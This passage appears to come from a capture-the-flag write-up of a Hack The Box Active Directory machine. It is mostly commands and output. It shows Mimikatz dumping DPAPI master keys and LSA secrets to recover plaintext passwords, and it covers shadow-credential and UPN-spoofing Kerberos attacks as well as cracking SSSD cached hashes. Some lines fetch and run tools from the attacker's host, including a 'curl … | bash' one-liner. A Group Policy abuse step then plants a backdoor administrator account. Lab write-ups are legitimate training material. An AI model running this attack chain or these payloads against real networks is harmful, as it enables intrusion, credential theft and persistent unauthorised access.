   [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
   [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi

Looking inside C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials\


Looking inside C:\Users\Administrator\AppData\Local\Microsoft\Credentials\

32B2774DF751FF7E28E78AE75C237A1E

 [+] Unattended files

 [+] SAM and SYSTEM backups
C:\Windows\System32\config\RegBack\SAM exists.
C:\Windows\System32\config\SAM exists.
C:\Windows\System32\config\SYSTEM exists.
C:\Windows\System32\config\RegBack\SYSTEM exists.

 [+] AppCmd
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe
C:\Windows\system32\inetsrv\appcmd.exe exists.

 [+] Files in registry that may contain credentials
   [i] Searching specific files that may contains credentials.
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
    W3SVC    REG_SZ    Software\Microsoft\W3SVC\CurrentVersion

DPAPI (struggle)

https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapihttps://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey

└─$ cp /usr/share/windows-resources/mimikatz/mimikatz.exe mimi.exe
*Evil-WinRM* PS C:\Users\Administrator\Documents> curl.exe 10.10.14.130/mimi.exe -Os
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimi.exe "sekurlsa::dpapi" "exit"
...
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEB-01$
Domain            : darkcorp
Logon Server      : (null)
Logon Time        : 2/14/2025 8:25:03 AM
SID               : S-1-5-18
         [00000000]
         * GUID      :  {b9f97cf8-ab4f-432b-90be-ec2c1313cf01}
         * Time      :  2/14/2025 9:34:06 AM
         * MasterKey :  f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635
         * sha1(key) :  053cd32f9169e99ffcca5cc495695762851cd85a
         [00000001]
         * GUID      :  {0398c226-b529-40ce-8f26-9d125bacd246}
         * Time      :  2/14/2025 8:25:10 AM
         * MasterKey :  4d98f653531a0dd73b34aebff0a8ca1a25e592f9823c57bdb7b66f0f3670d535c986b9a8f037d6adc715c9ff162c7efae1695890a618aed6466433982ed495b2
         * sha1(key) :  28d19153a3e41d3a615581ab8e72b55d143c3b5f
         [00000002]
         * GUID      :  {a4ae82ac-1990-4b2a-81de-22f930f5a2a6}
         * Time      :  2/14/2025 8:25:04 AM
         * MasterKey :  290c9657271af35267c866528a5c8acdea4e87f02f4622cf700e0bdbde2313fa05432d000b3c05dbab82171833299a1e1c46fcc1bea4722fa3a3707ae7f9a226
         * sha1(key) :  cfcceeaaaca2ff6d0971b684e7adc9a21fae2858
...

Note: I think the following keys would have worked if I used token::elevate first in ::cred and also I think we were not supposed to see these keys, probably other players...

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500 -force -rec

    Directory: C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         1/15/2025   4:11 PM            468 189c6409-5515-4114-81d2-6dde4d6912ce
-a-hs-         1/16/2025  10:35 AM            468 6037d071-cac5-481e-9e08-c4296c0a7ff7
-a-hs-         1/16/2025  10:35 AM             24 Preferred

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500
*Evil-WinRM* PS C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500> C:\Users\Administrator\Documents\mimi.exe "dpapi::masterkey /in:.\189c6409-5515-4114-81d2-6dde4d6912ce /rpc" "exit"
...
*Evil-WinRM* PS C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500> C:\Users\Administrator\Documents\mimi.exe "dpapi::masterkey /in:.\6037d071-cac5-481e-9e08-c4296c0a7ff7 /rpc" "exit"
...
*Evil-WinRM* PS C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500> C:\Users\Administrator\Documents\mimi.exe "dpapi::cache" "exit"
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
mimikatz(commandline) # dpapi::cache
CREDENTIALS cache
=================
MASTERKEYS cache
================
DOMAINKEYS cache
================

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimi.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E /masterkey:f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635" "exit"
...
Decrypting Credential:
 * masterkey     : f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635
ERROR kull_m_dpapi_unprotect_blob ; kull_m_crypto_hkey_session (0x00000005)
...
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimi.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E /masterkey:4d98f653531a0dd73b34aebff0a8ca1a25e592f9823c57bdb7b66f0f3670d535c986b9a8f037d6adc715c9ff162c7efae1695890a618aed6466433982ed495b2" "exit"
...
Decrypting Credential:
 * masterkey     : 4d98f653531a0dd73b34aebff0a8ca1a25e592f9823c57bdb7b66f0f3670d535c986b9a8f037d6adc715c9ff162c7efae1695890a618aed6466433982ed495b2
ERROR kull_m_dpapi_unprotect_blob ; kull_m_crypto_hkey_session (0x00000005)
...
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimi.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E /masterkey:290c9657271af35267c866528a5c8acdea4e87f02f4622cf700e0bdbde2313fa05432d000b3c05dbab82171833299a1e1c46fcc1bea4722fa3a3707ae7f9a226" "exit"
Decrypting Credential:
 * masterkey     : 290c9657271af35267c866528a5c8acdea4e87f02f4622cf700e0bdbde2313fa05432d000b3c05dbab82171833299a1e1c46fcc1bea4722fa3a3707ae7f9a226
ERROR kull_m_dpapi_unprotect_blob ; kull_m_crypto_hkey_session (0x00000005)
...

There's administrator keys and there's system32 keys

*Evil-WinRM* PS C:\Users\Administrator\Music> ls -path / -rec -dir -filter Protect -erroraction silent -force | %{$_.FullName}
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect
C:\Windows\System32\Microsoft\Protect

*Evil-WinRM* PS C:\Users\Administrator\Music> ls C:\Windows\System32\Microsoft\Protect -force -rec -file |%{$_.FullName}
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat.LOG1
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat.LOG2
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{365de4dd-d3e1-11ef-9e28-000c2946d384}.TM.blf
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{365de4dd-d3e1-11ef-9e28-000c2946d384}.TMContainer00000000000000000001.regtrans-ms
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{365de4dd-d3e1-11ef-9e28-000c2946d384}.TMContainer00000000000000000002.regtrans-ms
C:\Windows\System32\Microsoft\Protect\S-1-5-18\0398c226-b529-40ce-8f26-9d125bacd246
C:\Windows\System32\Microsoft\Protect\S-1-5-18\37804100-9399-4783-8353-2422ef13aee6
C:\Windows\System32\Microsoft\Protect\S-1-5-18\Preferred
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\a4ae82ac-1990-4b2a-81de-22f930f5a2a6
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\b9f97cf8-ab4f-432b-90be-ec2c1313cf01
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Diagnostic
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

Admin Password

Get the system DPAPI key: 1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472

*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "lsadump::secrets" "exit"
...
mimikatz(commandline) # lsadump::secrets
Domain : WEB-01
SysKey : 4cf6d0e998d53752d088e233abb4bed6

Local name : WEB-01 ( S-1-5-21-2988385993-1727309239-2541228647 )
Domain name : darkcorp ( S-1-5-21-3432610366-2163336488-3604236847 )
Domain FQDN : darkcorp.htb

Policy subsystem is : 1.18
LSA Key(s) : 1, default {bf8c7ab1-d9af-7cdf-8c22-3aa6152f2d8c}
  [00] {bf8c7ab1-d9af-7cdf-8c22-3aa6152f2d8c} 3f930625ab8021e47843ffa38e66ba50532ba33ccba2760de40ad91403533aea

Secret  : $MACHINE.ACC
cur/text: ARDl&qrZd"t#a=ORc^knO]'4KA:99tb21j@ZOO\K;vuf!cOu/<r]CLJX%ul-Dd_k88,'I,F@h';E !;BM_d;f#phUDi/T#2"_LVL<Io&Hv,]a4UGwJv_4tTH
    NTLM:8f33c7fc7ff515c1f358e488fbb8b675
    SHA1:3f88a920a1b4f5fadb6a8837de2b408cc45e83fb
old/text: ARDl&qrZd"t#a=ORc^knO]'4KA:99tb21j@ZOO\K;vuf!cOu/<r]CLJX%ul-Dd_k88,'I,F@h';E !;BM_d;f#phUDi/T#2"_LVL<Io&Hv,]a4UGwJv_4tTH
    NTLM:8f33c7fc7ff515c1f358e488fbb8b675
    SHA1:3f88a920a1b4f5fadb6a8837de2b408cc45e83fb

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 10 04 ce cd c9 b3 30 80 d2 5a 4a 29 12 6d 45 90 eb 55 5c 5f 7f 3f 9f 87 1e a1 da fa ea 01 ae 4c cf 6e 3f 7e e5 35 e4 72
    full: 1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472         # <--- THIS
    m/u : 1004cecdc9b33080d25a4a29126d4590eb555c5f / 7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
old/hex : 01 00 00 00 ba ea 4e 2a 46 12 e4 68 8c 1a 63 7a 35 3c 4c 66 3c 9e d9 d8 c9 8f 86 a0 a5 40 63 50 db 3e aa c1 52 58 de db 19 b6 2f 7f
    full: baea4e2a4612e4688c1a637a353c4c663c9ed9d8c98f86a0a5406350db3eaac15258dedb19b62f7f
    m/u : baea4e2a4612e4688c1a637a353c4c663c9ed9d8 / c98f86a0a5406350db3eaac15258dedb19b62f7f

Secret  : NL$KM
cur/hex : dd c9 21 14 b9 23 69 1b d8 be fd 57 6b 3c 3e e1 9d 3d 3f 74 82 af 75 33 fd 74 61 6e b7 24 55 af 6f 61 a0 bc 2b 2a 86 cf 6e ec e0 d3 37 98 fe e5 14 54 7d a9 a6 45 19 37 f1 20 24 4b 18 43 19 72
old/hex : dd c9 21 14 b9 23 69 1b d8 be fd 57 6b 3c 3e e1 9d 3d 3f 74 82 af 75 33 fd 74 61 6e b7 24 55 af 6f 61 a0 bc 2b 2a 86 cf 6e ec e0 d3 37 98 fe e5 14 54 7d a9 a6 45 19 37 f1 20 24 4b 18 43 19 72

*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "dpapi::masterkey /in:C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\b9f97cf8-ab4f-432b-90be-ec2c1313cf01 /system:1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472" "exit"
...
[masterkey] with DPAPI_SYSTEM (machine, then user): 1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
** USER **
  key : f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635
  sha1: 053cd32f9169e99ffcca5cc495695762851cd85a

Now we have the master key, let's find blob and decrypt:

*Evil-WinRM* PS C:\Users\Administrator\Music> ls -path / -rec -dir -filter Credentials -erroraction silent -force | %{$_.FullName}
C:\Users\Administrator\AppData\Local\Microsoft\Credentials
C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials
C:\Users\Administrator\Documents\credentials
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
*Evil-WinRM* PS C:\Users\Administrator\Music> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials -force |%{$_.FullName}
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\25EE02BE85D0F32011CE03B1B0D2FB47

*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\25EE02BE85D0F32011CE03B1B0D2FB47 /masterkey:f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635" "exit"
...
Decrypting Credential:
 * masterkey     : f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 0000011e - 286
  credUnk0       : 00004004 - 16388

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 1/20/2025 10:01:28 PM
  unkFlagsOrSize : 00000020 - 32
  Persist        : 00000002 - 2 - local_machine
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6}
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : WEB-01\Administrator
  CredentialBlob : But_Lying_Aid9!
  Attributes     : 0
...

Admin Blobs

Same can be done for admin blobs

*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "dpapi::masterkey /in:C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500\6037d071-cac5-481e-9e08-c4296c0a7ff7 /system:1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472 /password:But_Lying_Aid9!" "exit"
...
Auto SID from path seems to be: S-1-5-21-2988385993-1727309239-2541228647-500

[masterkey] with password: But_Lying_Aid9! (normal user)
  key : ac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da
  sha1: 6e08761666a9819671bbc5bbacfb4671964367b7

[backupkey] with DPAPI_SYSTEM: 1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
  key : 114ce98533e2d1410e1a0b8c8727efe0e9ec312961e5dc9b12ada8cf8986cf71
  sha1: 4832b578a09baa9e7f8858a4242da25c0915aa9b
...

*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E /masterkey:ac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da" "exit"
...
  UserName       : Administrator
  CredentialBlob : Pack_Beneath_Solid9!
...

john.w pwned

└─$ proxychains -q netexec smb 172.16.20.1 -u users.txt -p 'But_Lying_Aid9!' --continue-on-success
...
└─$ proxychains -q netexec smb 172.16.20.1 -u users.txt -p 'Pack_Beneath_Solid9!' --continue-on-success
...
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\john.w:Pack_Beneath_Solid9!
...

Privilege Escalation (angela.w)

Writeup-25.png

We can reset the user's password, but considering we are on HTB that's not a good idea. Instead we can use shadow credentials attack and get NTLM password for user.

└─$ proxychains -q certipy-ad shadow auto -u 'john.w@darkcorp.htb' -p 'Pack_Beneath_Solid9!' -account angela.w -target darkcorp.htb -dc-ip 172.16.20.1
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'angela.w'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '262b09d0-c462-8f5d-854b-983100771fb1'
[*] Adding Key Credential with device ID '262b09d0-c462-8f5d-854b-983100771fb1' to the Key Credentials for 'angela.w'
[*] Successfully added Key Credential with device ID '262b09d0-c462-8f5d-854b-983100771fb1' to the Key Credentials for 'angela.w'
[*] Authenticating as 'angela.w' with the certificate
[*] Using principal: angela.w@darkcorp.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'angela.w.ccache'
[*] Trying to retrieve NT hash for 'angela.w'
[*] Restoring the old Key Credentials for 'angela.w'
[*] Successfully restored the old Key Credentials for 'angela.w'
[*] NT hash for 'angela.w': 957246c8137069bca672dc6aa0af7c7a

Update bloodhound

└─$ proxychains -q bloodhound-python -u 'angela.w' --hashes ':957246c8137069bca672dc6aa0af7c7a' -d darkcorp.htb -dc dc-01.darkcorp.htb -ns 172.16.20.1 --zip --dns-tcp --dns-timeout 100 -c all -op angela.w

Nothing new...

Angela has second user with .adm suffix indicating higher privileges, but password doesn't work.

Writeup-26.png

Privilege Escalation (angela.w.adm)

sAMAccountName spoofing

The Hacker Recipes: sAMAccountName spoofing - User accountDEF CON 31 - A Broken Marriage Abusing Mixed Vendor Kerberos Stacks - Ceri CoburnA broken marriage. Abusing mixed vendor Kerberos stacks: If NT_ENTERPRISE is used as the hint, userPrincipalName is searched first.

https://github.com/CravateRouge/bloodyAD/wiki/User-Guide#set-object

└─$ proxychains -q bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u 'john.w' -p 'Pack_Beneath_Solid9!' set object angela.w userPrincipalName -v angela.w.adm
[+] angela.w userPrincipalName has been updated

└─$ proxychains -q bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u 'john.w' -p 'Pack_Beneath_Solid9!' get object angela.w | grep Name
distinguishedName: CN=Angela Williams,CN=Users,DC=darkcorp,DC=htb
givenName: Angela
sAMAccountName: angela.w
userPrincipalName: angela.w.adm

└─$ proxychains -q impacket-getTGT -dc-ip 'dc-01.darkcorp.htb' 'darkcorp.htb'/'angela.w.adm' -hashes ':957246c8137069bca672dc6aa0af7c7a' -principalType NT_ENTERPRISE
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in angela.w.adm.ccache

└─$ export KRB5CCNAME=$(readlink -f ./angela.w.adm.ccache)
└─$ klist
Ticket cache: FILE:/home/woyag/Desktop/Rooms/DarkCorp/angela.w.adm.ccache
Default principal: angela.w.adm@DARKCORP.HTB

Valid starting       Expires              Service principal
02/16/2025 00:46:55  02/16/2025 10:46:55  krbtgt/DARKCORP.HTB@DARKCORP.HTB
        renew until 02/17/2025 00:46:55

Remote kerberos authentication via ssh was tricky -k or -K flag didn't want to work...

Linux (Root)

We can ksu locally

└─$ sshpass -p 'ThePlague61780' scp ./angela.w.adm.ccache ebelford@drip.htb:/tmp/root.ccache
ebelford@drip:/tmp$ KRB5CCNAME=/tmp/root.ccache ksu angela.w.adm
Authenticated angela.w.adm@DARKCORP.HTB
Account angela.w.adm: authorization for angela.w.adm@DARKCORP.HTB successful
Changing uid to angela.w.adm (1730401107)
angela.w.adm@drip:/tmp$ id
uid=1730401107(angela.w.adm) gid=1730400513(domain users) groups=1730400513(domain users),1730401109(linux_admins)
angela.w.adm@drip:/tmp$ sudo -l
Matching Defaults entries for angela.w.adm on drip:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User angela.w.adm may run the following commands on drip:
    (ALL : ALL) NOPASSWD: ALL

Privilege Escalation (taylor.b.adm)

angela.w.adm@drip:/tmp$ sudo su
root@drip:~# curl 10.10.14.130/lp.sh|bash|tee lp.log

Writeup-27.png

Writeup-28.png

SSSD (System Security Services Daemon)

https://github.com/ricardojoserf/SSSD-creds

root@drip:~# tar -czvf ldb.tgz /var/lib/sss/db/*.ldb
root@drip:~# install -m444 ldb.tgz /tmp                                                                  
└─$ sshpass -p 'ThePlague61780' scp ebelford@drip.htb:/tmp/ldb.tgz .
└─$ tar -xvzf ldb.tgz
└─$ curl -LOs https://raw.githubusercontent.com/ricardojoserf/SSSD-creds/refs/heads/main/analyze.sh
└─$ chmod +x analyze.sh
└─$ ./analyze.sh ./var/lib/sss/db
### 2 hash found in ./var/lib/sss/db/cache_darkcorp.htb.ldb ###
Account:        taylor.b.adm@darkcorp.htb
Hash:           $6$grFlZFmVmihASKFH$eGztifERI7QdAtpkClRdZOkbNAoPQzVWEiy4VqAQBUiSpCpm3cXKlajEalTLm9wz.qq77zMkemWIWUXo.wQmk0

Account:        victor.r@darkcorp.htb
Hash:           $6$hQ95QZ32eYKto9gy$7uXvPC4xhOZyuuLUsHyhh8Nths.EP1wPlMbr0AXPXrlxJ26lnOFBJG6ekSovGjufJSokA/KRoHGmQwXbr437k0
  =====> Adding ./var/lib/sss/db/cache_darkcorp.htb.ldb hashes to hashes.txt <=====
### 0 hash found in ./var/lib/sss/db/config.ldb ###
### 0 hash found in ./var/lib/sss/db/sssd.ldb ###
### 0 hash found in ./var/lib/sss/db/timestamps_darkcorp.htb.ldb ###

Great, out target was taylor and we can probably can crack the hash.

➜ .\hashcat.exe -a 0  .\hashes.txt .\rockyou.txt
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
➜ .\hashcat.exe -a 0  -m 1800 .\hashes.txt .\rockyou.txt
$6$grFlZFmVmihASKFH$eGztifERI7QdAtpkClRdZOkbNAoPQzVWEiy4VqAQBUiSpCpm3cXKlajEalTLm9wz.qq77zMkemWIWUXo.wQmk0:!QAZzaq1

Privilege Escalation (DC Administrator)

└─$ proxychains -q evil-winrm -i 172.16.20.1 -u 'taylor.b.adm' -p '!QAZzaq1'
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> whoami /all
User Name             SID
===================== ===============================================
darkcorp\taylor.b.adm S-1-5-21-3432610366-2163336488-3604236847-14101

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
darkcorp\linux_admins                       Group            S-1-5-21-3432610366-2163336488-3604236847-1109 Mandatory group, Enabled by default, Enabled group
darkcorp\gpo_manager                        Group            S-1-5-21-3432610366-2163336488-3604236847-1110 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Update bloodhound

└─$ proxychains -q bloodhound-python -u 'taylor.b.adm' -p '!QAZzaq1' -d darkcorp.htb -dc dc-01.darkcorp.htb -ns 172.16.20.1 --zip --dns-tcp --dns-timeout 100 -c all -op taylor.b.adm

GPO Abuse

Writeup-29.png

Writeup-30.png

Writeup-31.png

SharpGPOAbuse gets deleted as soon as it's uploaded, AV is ON.

*Evil-WinRM* PS C:\Users\taylor.b.adm\Music> curl.exe 10.10.14.130/SharpGPOAbuse.exe -o sa.exe
*Evil-WinRM* PS C:\Users\taylor.b.adm\Music> ls -force

https://www.thehacker.recipes/ad/movement/group-policieshttps://ppn.snovvcrash.rocks/pentest/infrastructure/ad/gpo-abuse

└─$ git clone -q https://github.com/X-C3LL/GPOwned.git
└─$ git clone -q https://github.com/Hackndo/pyGPOAbuse.git

https://github.com/gwillgues/Reverse-Shells.git

*Evil-WinRM* PS C:\Users\taylor.b.adm\Music> curl.exe 10.10.14.130/rev.exe -O

Note: Never mind this binary, GPOwned failed to execute it so useless

└─$ proxychains -q python ./GPOwned/GPOwned.py -u 'taylor.b.adm' -p '!QAZzaq1' -d 'darkcorp.htb' -dc-ip '172.16.20.1' -gpcmachine -listgpo
                GPO Helper - @TheXC3LL
                Modifications by - @Fabrizzio53


[*] Connecting to LDAP service at 172.16.20.1
[*] Requesting GPOs info from LDAP

[+] Name: {31B2F340-016D-11D2-945F-00C04FB984F9}
        [-] displayName: Default Domain Policy
        [-] gPCFileSysPath: \\darkcorp.htb\sysvol\darkcorp.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
        [-] gPCMachineExtensionNames: [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
        [-] versionNumber: 3
        [-] Verbose:
                ---             ---
                Registry Settings
                EFS Policy
                ---             ---
                Security
                Computer Restricted Groups
                ---             ---
                EFS Recovery
                EFS Policy

[+] Name: {6AC1786C-016F-11D2-945F-00C04fB984F9}
        [-] displayName: Default Domain Controllers Policy
        [-] gPCFileSysPath: \\darkcorp.htb\sysvol\darkcorp.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
        [-] gPCMachineExtensionNames: [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{B05566AC-FE9C-4368-BE01-7A4CBB6CBA11}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{F3CCC681-B74C-4060-9F26-CD84525DCA2A}{0F3F3735-573D-9804-99E4-AB2A69BA5FD4}]
        [-] versionNumber: 35
        [-] Verbose:
                ---             ---
                Registry Settings
                Windows Firewall
                ---             ---
                Security
                Computer Restricted Groups
                ---             ---
                Audit Policy Configuration
                Computer Policy Setting

[+] Name: {652CAE9A-4BB7-49F2-9E52-3361F33CE786}
        [-] displayName: SecurityUpdates
        [-] gPCFileSysPath: \\darkcorp.htb\SysVol\darkcorp.htb\Policies\{652CAE9A-4BB7-49F2-9E52-3361F33CE786}
        [-] gPCMachineExtensionNames: None
        [-] versionNumber: 0
        [-] Verbose:

[^] Have a nice day!

└─$ proxychains -q python ./pyGPOAbuse/pygpoabuse.py 'darkcorp.htb'/'taylor.b.adm':'!QAZzaq1' -gpo-id '652CAE9A-4BB7-49F2-9E52-3361F33CE786' -command 'net user letmein Password123$ /add && net localgroup administrators letmein /add && net localgroup "Remote Management Users" letmein /add' -f -v
INFO:root:Version updated
[*] Version updated
SUCCESS:root:ScheduledTask TASK_1b9c4181 created!
[+] ScheduledTask TASK_1b9c4181 created!

Root.txt

└─$ proxychains -q evil-winrm -i 172.16.20.1 -u 'letmein' -p 'Password123$'
*Evil-WinRM* PS C:\Users\letmein\Documents> cat /Users/Administrator/Desktop/root.txt
8339785c8c77cd44f5eb1b9c93aeed39